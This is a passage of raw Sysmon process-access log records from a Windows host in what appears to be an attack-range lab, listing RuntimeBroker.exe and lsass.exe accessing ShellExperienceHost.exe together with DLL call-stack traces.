\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba 10341000x800000000000000010785Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.395{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12ac55|C:\Windows\System32\Windows.Storage.dll+ddfa8|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000010784Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.395{266CAFBE-64C4-6064-9B00-00000000AE01}49243560C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac29|C:\Windows\System32\Windows.Storage.dll+ddfa8|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e906c 10341000x800000000000000010783Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.332{266CAFBE-64C4-6064-9B00-00000000AE01}49244508C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ce7c|C:\Windows\System32\Windows.Storage.dll+dbd39|C:\Windows\System32\Windows.Storage.dll+dbb65|C:\Windows\System32\Windows.Storage.dll+615c6|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000010782Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010781Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010780Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010779Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010778Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010777Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010776Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010775Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010774Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010773Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010772Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010771Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.317{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010770Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49246040C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010769Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010768Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49242972C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000010767Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000010766Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:09:18.301{266CAFBE-64C4-6064-9B00-00000000AE01}49245960C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+5109